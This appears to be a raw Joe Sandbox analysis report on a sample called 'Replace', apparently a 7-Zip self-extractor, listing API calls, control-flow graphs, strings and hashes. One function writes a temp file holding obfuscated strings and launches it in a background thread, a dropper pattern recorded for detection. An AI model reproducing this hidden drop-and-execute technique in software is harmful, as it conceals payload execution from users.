20740 bd9330 20728->20740 20731 bcb436 20731->20731 20732 bcb455 WriteFile FindCloseChangeNotification 20731->20732 20733 bcb47c IsInExceptionSpec 20732->20733 20734 bcb652 20733->20734 20735 bcb602 CreateProcessW CloseHandle CloseHandle 20733->20735 20736 bcbfa4 5 API calls 20734->20736 20737 bcbe6f __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 20735->20737 20739 bcb657 20736->20739 20738 bcb64b 20737->20738 20741 bc6c23 GetTempPathW GetTempFileNameW CreateFileW 20740->20741 20741->20731 20915 bbfc27 20918 bbfc49 20915->20918 20917 bbfc2f 20919 bbfc97 20918->20919 20921 bbfc9f 20918->20921 20920 bd0548 ___vcrt_freefls@4 14 API calls 20919->20920 20920->20921 20922 bbfcb3 20921->20922 20923 bd0548 ___vcrt_freefls@4 14 API calls 20921->20923 20924 bd0548 ___vcrt_freefls@4 14 API calls 20922->20924 20923->20922 20925 bbfcc0 20924->20925 20925->20917 20926 bbca67 EnterCriticalSection 20927 bbca8c 20926->20927 20928 bbca9e 20927->20928 20931 bb6f6f 6 API calls 20927->20931 20930 bbcaf9 LeaveCriticalSection 20928->20930 20932 bb6ea6 2 API calls 20928->20932 20929 bbcad0 20929->20930 20931->20928 20932->20929 20933 bc0960 20934 bc0978 20933->20934 20935 bc096e 20933->20935 20935->20934 20936 bd0563 ___std_exception_copy 15 API calls 20935->20936 20936->20934 20937 bbeb06 20938 bb45a0 2 API calls 20937->20938 20942 bbeb13 20938->20942 20939 bbeb36 20940 bb45bc SetEvent 20940->20942 20941 bb45a0 2 API calls 20941->20942 20942->20939 20942->20940 20942->20941 20943 bbe1c4 17 API calls 20942->20943 20943->20942 20944 bb7d65 EnterCriticalSection LeaveCriticalSection 20945 bb7dbc 20944->20945 20965 bb7e83 20944->20965 20947 bb7fb2 PostMessageA 20945->20947 20946 bcbe6f __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 20948 bb7eb5 20946->20948 20949 bb7dc3 EnterCriticalSection LeaveCriticalSection 20947->20949 20950 bb7dee 20949->20950 20951 bb7df3 20949->20951 20950->20951 20952 bb7dfc 20950->20952 20976 bb7c85 20951->20976 20966 bb7cf6 20952->20966 20955 bb7e09 __aulldiv 20955->20965 20970 bb3de7 20955->20970 20958 bb16dc 16 API calls 20959 bb7e4f 20958->20959 20960 bb1a00 16 API calls 20959->20960 20961 bb7e60 20960->20961 20962 bb1614 16 API calls 20961->20962 20963 bb7e74 20962->20963 20964 bb7b3e 21 API calls 20963->20964 20964->20965 20965->20946 20967 bb7d0e 20966->20967 20968 bb7d49 SendMessageA 20967->20968 20969 bb7d5e 20967->20969 20968->20969 20969->20955 20971 bb3e04 20970->20971 20975 bb3e14 __aulldvrm 20970->20975 20971->20975 20979 bb3d89 20971->20979 20973 bcbe6f __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 20974 bb3e67 20973->20974 20974->20958 20975->20973 20977 bb7cb3 20976->20977 20978 bb7cdf SendMessageA 20977->20978 20978->20952 20980 bb3da5 20979->20980 20981 bcbe6f __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 20980->20981 20982 bb3de5 20981->20982 20982->20975

                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                              Function 00BCB658 Relevance: 46.0, APIs: 16, Strings: 10, Instructions: 482windowsynchronizationprocessCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 18 bcb658-bcb68b call bd91a9 GetVersionExA 21 bcb68d-bcb694 18->21 22 bcb69a 18->22 21->22 23 bcb696-bcb698 21->23 24 bcb69c-bcb755 call bb4473 CreateThread call bb16b8 * 4 GetCommandLineW call bb16dc call bb1c55 call bcbe7d call bb16b8 call bb207d call bb1c1d 22->24 23->24 47 bcb75b-bcb78a 24->47 48 bcb78c 47->48 49 bcb78f-bcb795 47->49 48->49 50 bcb7d4 49->50 51 bcb797-bcb7a8 49->51 53 bcb7da-bcb80f call bb1716 call bb16b8 * 2 50->53 51->47 52 bcb7aa-bcb7d2 call bb1787 call bb1c1d 51->52 52->53 64 bcb82b-bcb843 call bb16b8 call bb2bdc 53->64 65 bcb811-bcb829 call bb28b3 53->65 75 bcb845-bcb850 call bcbe7d 64->75 76 bcb852-bcb889 call bb167f call bb2c84 call bcbe7d 64->76 65->64 70 bcb897-bcb899 65->70 72 bcb8af-bcb8b2 70->72 73 bcb89b-bcb8a9 MessageBoxW 70->73 77 bcbda9-bcbdb2 72->77 73->72 86 bcb896 75->86 96 bcb88b-bcb890 call bcbe7d 76->96 97 bcb8b7-bcb8f1 call bcbe7d call bcc0bb call bb40f4 76->97 78 bcbdbf-bcbe26 call bcbe7d * 8 call bd9167 77->78 79 bcbdb4-bcbdba call bb28b3 77->79 79->78 86->70 96->86 112 bcb914-bcb95d call bb1759 call bb16b8 call bc615f 97->112 113 bcb8f3-bcb90f MessageBoxW 97->113 128 bcb9fb-bcba30 call bcbe7d call bb16b8 call bb2ae0 call bb2aa0 112->128 129 bcb963-bcb96a 112->129 115 bcbd96-bcbda3 113->115 115->77 157 bcba36-bcba3d 128->157 158 bcbd21-bcbd29 128->158 130 bcb96c-bcb96e 129->130 131 bcb980 129->131 133 bcb99a-bcb9aa call bb1787 130->133 134 bcb970-bcb977 130->134 135 bcb986-bcb995 call bcbe7d 131->135 143 bcb9af-bcb9b6 133->143 134->133 138 bcb979-bcb97e 134->138 145 bcbd8a-bcbd95 call bcbe7d 135->145 138->131 138->143 147 bcb9b8-bcb9e2 call bb21b1 call bb17ef call bcbe7d 143->147 148 bcb9e3-bcb9f9 MessageBoxW 143->148 145->115 147->148 148->135 160 bcbb40-bcbb47 157->160 161 bcba43-bcba8b call bb2037 157->161 162 bcbd7f-bcbd85 call bc6afc 158->162 165 bcbb8d-bcbc39 call bb1759 call bb3784 call bb16dc call bb1b03 call bcbe7d * 2 call bb1759 call bb16dc call bb1b03 call bcbe7d 160->165 166 bcbb49-bcbb5f call bb1787 call bb3635 160->166 173 bcba8d-bcba94 161->173 174 bcbab5-bcbb05 call bb2037 ShellExecuteExA 161->174 162->145 220 bcbc5a-bcbcf4 call bb1614 call bb2037 call bcbe7d CreateProcessA 165->220 221 bcbc3b-bcbc55 call bb12c1 call bb19c5 165->221 183 bcbb64-bcbb66 166->183 178 bcba96-bcba9e call bb12c1 173->178 179 bcbaa3-bcbab0 call bb19c5 173->179 186 bcbb2f-bcbb3b 174->186 187 bcbb07-bcbb0e 174->187 178->179 179->174 183->165 189 bcbb68-bcbb6e 183->189 193 bcbd43-bcbd5d call bcbe7d * 2 186->193 190 bcbb24-bcbb2a 187->190 191 bcbb10-bcbb1e MessageBoxW 187->191 189->158 194 bcbb74-bcbb88 MessageBoxW 189->194 195 bcbd0f-bcbd20 call bcbe7d * 2 190->195 191->190 209 bcbd5f-bcbd65 WaitForSingleObject CloseHandle 193->209 210 bcbd6b-bcbd7d WaitForSingleObject CloseHandle 193->210 194->158 195->158 209->210 210->162 231 bcbd2b-bcbd3d CloseHandle 220->231 232 bcbcf6-bcbcfc 220->232 221->220 231->193 233 bcbcfe-bcbd04 call bc6baf 232->233 234 bcbd09 232->234 233->234 234->195
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00BCB662
                                                                                                                                                                                                              • GetVersionExA.KERNEL32 ref: 00BCB680
                                                                                                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,00BC6C19,00000000,00000000,00000000), ref: 00BCB6B2
                                                                                                                                                                                                              • GetCommandLineW.KERNEL32 ref: 00BCB6EA
                                                                                                                                                                                                              • MessageBoxW.USER32(00000000,Cannot create temp folder archive,7-Zip,00000010), ref: 00BCB8A9
                                                                                                                                                                                                                • Part of subcall function 00BB2C84: __EH_prolog3_GS.LIBCMT ref: 00BB2C8B
                                                                                                                                                                                                                • Part of subcall function 00BB2C84: GetCurrentThreadId.KERNEL32 ref: 00BB2C99
                                                                                                                                                                                                                • Part of subcall function 00BB2C84: GetTickCount.KERNEL32 ref: 00BB2CA4
                                                                                                                                                                                                                • Part of subcall function 00BB2C84: GetCurrentProcessId.KERNEL32 ref: 00BB2CB1
                                                                                                                                                                                                                • Part of subcall function 00BB2C84: GetTickCount.KERNEL32 ref: 00BB2D02
                                                                                                                                                                                                                • Part of subcall function 00BB2C84: SetLastError.KERNEL32(000000B7,00000000,00000000), ref: 00BB2D4E
                                                                                                                                                                                                              • MessageBoxW.USER32(00000000,Cannot load codecs,7-Zip,00000010), ref: 00BCB901
                                                                                                                                                                                                              • MessageBoxW.USER32(00000000,?,Extraction Failed,00000010), ref: 00BCB9F3
                                                                                                                                                                                                              • ShellExecuteExA.SHELL32(-00000172,00000000), ref: 00BCBAF8
                                                                                                                                                                                                              • MessageBoxW.USER32(00000000,Cannot open file,7-Zip,00000010), ref: 00BCBB1E
                                                                                                                                                                                                              • MessageBoxW.USER32(00000000,Cannot find run.exe,7-Zip,00000010), ref: 00BCBB82
                                                                                                                                                                                                              • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,-000001CE,-00000182,00000000,?,?,?), ref: 00BCBCEC
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00BCBD31
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00BCBD62
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00BCBD65
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00BCBD74
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00BCBD77
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$CloseHandle$CountCreateCurrentH_prolog3_ObjectProcessSingleThreadTickWait$CommandErrorExecuteLastLineShellVersion
                                                                                                                                                                                                              • String ID: %%T$%%T\$7-Zip$Cannot create temp folder archive$Cannot find run.exe$Cannot load codecs$Cannot open file$Extraction Failed$File is corrupt$run.exe
                                                                                                                                                                                                              • API String ID: 3057246094-981852518
                                                                                                                                                                                                              • Opcode ID: 2bd4ddd575073586cdac34ad28870cff24f4a14554afbb24362db7c6b6243309
                                                                                                                                                                                                              • Instruction ID: beecaa5c4885897f12dbb59527989e08e4e23e323d1f8a40dacedcc3cc62c0b7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2bd4ddd575073586cdac34ad28870cff24f4a14554afbb24362db7c6b6243309
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BA123871900269DBEB25AB60DC62FEDB7F5AF15300F5085EEE10A761A1DBB01E84CF51
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BB805B Relevance: 4.6, APIs: 3, Instructions: 89COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 834 bb805b-bb8085 GetCurrentProcess GetProcessAffinityMask 835 bb8087-bb808b 834->835 836 bb80a4-bb80af GetSystemInfo 834->836 835->836 837 bb808d-bb808f 835->837 838 bb80b3-bb80de call bc06b9 836->838 839 bb8091-bb80a0 837->839 842 bb80e3-bb80e8 838->842 839->839 841 bb80a2 839->841 841->838 843 bb80ea-bb80ff 842->843 844 bb8134-bb813b 842->844 845 bb8101-bb8103 843->845 846 bb8105-bb8107 843->846 845->846 847 bb8109-bb8131 call bb7ffe 845->847 846->847 847->844
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?), ref: 00BB8074
                                                                                                                                                                                                              • GetProcessAffinityMask.KERNEL32(00000000), ref: 00BB807B
                                                                                                                                                                                                              • GetSystemInfo.KERNEL32(?), ref: 00BB80A9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process$AffinityCurrentInfoMaskSystem
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3251479945-0
                                                                                                                                                                                                              • Opcode ID: 5c135a51437a9deed507c88f27bdf60154c9b66323efaecc755e70547962ff37
                                                                                                                                                                                                              • Instruction ID: 3ed629ed5cb09c3fe657875f962813d0041da5c9bd7a6a1f21b07a59a0697138
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c135a51437a9deed507c88f27bdf60154c9b66323efaecc755e70547962ff37
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A53184B16057459FC724DF6AD885567FBE9FB88300B504A2EE49AC3700EB70E908CB51
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BD0F91 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?,00BD0F90,?,?,?,?), ref: 00BD0FB3
                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,00BD0F90,?,?,?,?), ref: 00BD0FBA
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00BD0FCC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                              • Opcode ID: 0aa1c7d4f66ac740009b8889dbf41c13e782d3276a490692bf0d5b0d45ac1680
                                                                                                                                                                                                              • Instruction ID: 9e7480f295b8d42ef0492cf17b338380f1c8bd774f95a61ac4dcde9900ea86eb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0aa1c7d4f66ac740009b8889dbf41c13e782d3276a490692bf0d5b0d45ac1680
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4E04635022148EFCF213B14CC69E59BBB8FB40341F11445AF80496631EF36EC82CA90
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BB2EFC Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BB2EDD: FindClose.KERNEL32(0000002A,0000002A,00BB2F26,?,?,00000001), ref: 00BB2EE7
                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(00000000,?,?,?,00000001), ref: 00BB2F6F
                                                                                                                                                                                                                • Part of subcall function 00BB1BB2: AreFileApisANSI.KERNEL32(?,00000010,00BB2F3E,?,?,00000001), ref: 00BB1BD0
                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,?,?,00000001), ref: 00BB2F45
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileFind$First$ApisClose
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1888877809-0
                                                                                                                                                                                                              • Opcode ID: b590c4c34fceb9e7fb107ff7a6033b81c523425884cac0f3e094cd2bca5e4f8c
                                                                                                                                                                                                              • Instruction ID: b3c260bc828ffcb932e07676c4dc7c39dcfe4b766e5cce4d6ac48d2e3a4b8a45
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b590c4c34fceb9e7fb107ff7a6033b81c523425884cac0f3e094cd2bca5e4f8c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4A118F32108201DBC720AF64D8959FAF7E4EF55360F104AAEE8928B1A1DF709846CB91
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BB52F0 Relevance: 1.8, Strings: 1, Instructions: 522COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: Split
                                                                                                                                                                                                              • API String ID: 0-1882502421
                                                                                                                                                                                                              • Opcode ID: fbd4e3ff1b9c6e15e1a6feab3f81a2ee1bb50334182bd1998901695344b7b0a6
                                                                                                                                                                                                              • Instruction ID: 95e2114fd78d8729b4a02951b47c529ad565cfa41c7854fda932f4bf4d297b4a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fbd4e3ff1b9c6e15e1a6feab3f81a2ee1bb50334182bd1998901695344b7b0a6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 57221870E016099FDF24DFA8C894BEDBBF5EF58304F2480A9E905AB252D7B1AD41CB51
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BD269F Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 40dd89ec2a540ef258a71555c7db5a68b3793816bf96df627c5aea1af41fd682
                                                                                                                                                                                                              • Instruction ID: fa9c6eb12b642ed872f29d5874bcfec2427fdf95bfe71f035a46cedd329ab5fb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 40dd89ec2a540ef258a71555c7db5a68b3793816bf96df627c5aea1af41fd682
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 79F0A032610368EBCB22C748C405E48B3E8EB05B60F110097E805EB351E6B4DE40C7C0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BC6C19 Relevance: 78.9, APIs: 8, Strings: 36, Instructions: 1892fileprocessCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 00BC6C78
                                                                                                                                                                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?), ref: 00BC6C99
                                                                                                                                                                                                              • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 00BC6CB6
                                                                                                                                                                                                              • WriteFile.KERNELBASE(00000000,7A0D4CE0,00001A00,00000000,00000000), ref: 00BCB45E
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00BCB46B
                                                                                                                                                                                                              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00BCB625
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00BCB62F
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00BCB635
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseFile$CreateHandleTemp$ChangeFindNameNotificationPathProcessWrite
                                                                                                                                                                                                              • String ID: >_,$4$#(*f$+2*$6>m$7Bb1$A=V$BMh$BQ&$C$CQ&$Ey#)$G$GU"$KY.$MXJ$N8+$WGE$]cU$_$_0$bj~9$h#P$kq.g$l$o(W;$orA$w$w$zX+$zU"$|oez$=@$Lz$[vQ$k%
                                                                                                                                                                                                              • API String ID: 2508044720-2254058905
                                                                                                                                                                                                              • Opcode ID: 440d5ceafb787452e9dc8199cd98cbc4308fdee033a45595c6ccfa86efb9378e
                                                                                                                                                                                                              • Instruction ID: 31b3f6b36ecfa0e63bf71667a30f3c0541c57ebd9b47c8295a1f7c0f02e03bf5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 440d5ceafb787452e9dc8199cd98cbc4308fdee033a45595c6ccfa86efb9378e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7963A4B841E7C18AE3309F469A956DFBAE1FB92344F608A0DD1DD1B614DBB50182CF87
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BC06B9 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 236 bc06b9-bc06f6 GetModuleHandleA GetProcAddress 237 bc071f-bc073a GlobalMemoryStatus 236->237 238 bc06f8-bc0700 GlobalMemoryStatusEx 236->238 240 bc073e-bc074e call bcbe6f 237->240 238->237 239 bc0702-bc0708 238->239 241 bc070a-bc070d 239->241 242 bc0714-bc0717 239->242 244 bc070f-bc0712 241->244 245 bc071a-bc071d 241->245 242->245 244->242 244->245 245->240
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 00BC06E7
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00BC06EE
                                                                                                                                                                                                              • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 00BC06FC
                                                                                                                                                                                                              • GlobalMemoryStatus.KERNEL32(?), ref: 00BC072A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: GlobalMemoryStatus$AddressHandleModuleProc
                                                                                                                                                                                                              • String ID: $@$GlobalMemoryStatusEx$kernel32.dll
                                                                                                                                                                                                              • API String ID: 180289352-802862622
                                                                                                                                                                                                              • Opcode ID: 44948fa042ea8342c5ec0d0edb21ee78ffda2ea5bbf677432222ccb933826e3f
                                                                                                                                                                                                              • Instruction ID: bde11fe87af517d7f6ae9258bbc059a5b6d8d9da322198ea780aec2afcdbd298
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 44948fa042ea8342c5ec0d0edb21ee78ffda2ea5bbf677432222ccb933826e3f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E110370920319DBDB18EFA4C8A9B9DB7F5EF04700F50849EE516A7280EB74AD00CF18
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BB2C84 Relevance: 10.6, APIs: 7, Instructions: 95threadCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00BB2C8B
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00BB2C99
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00BB2CA4
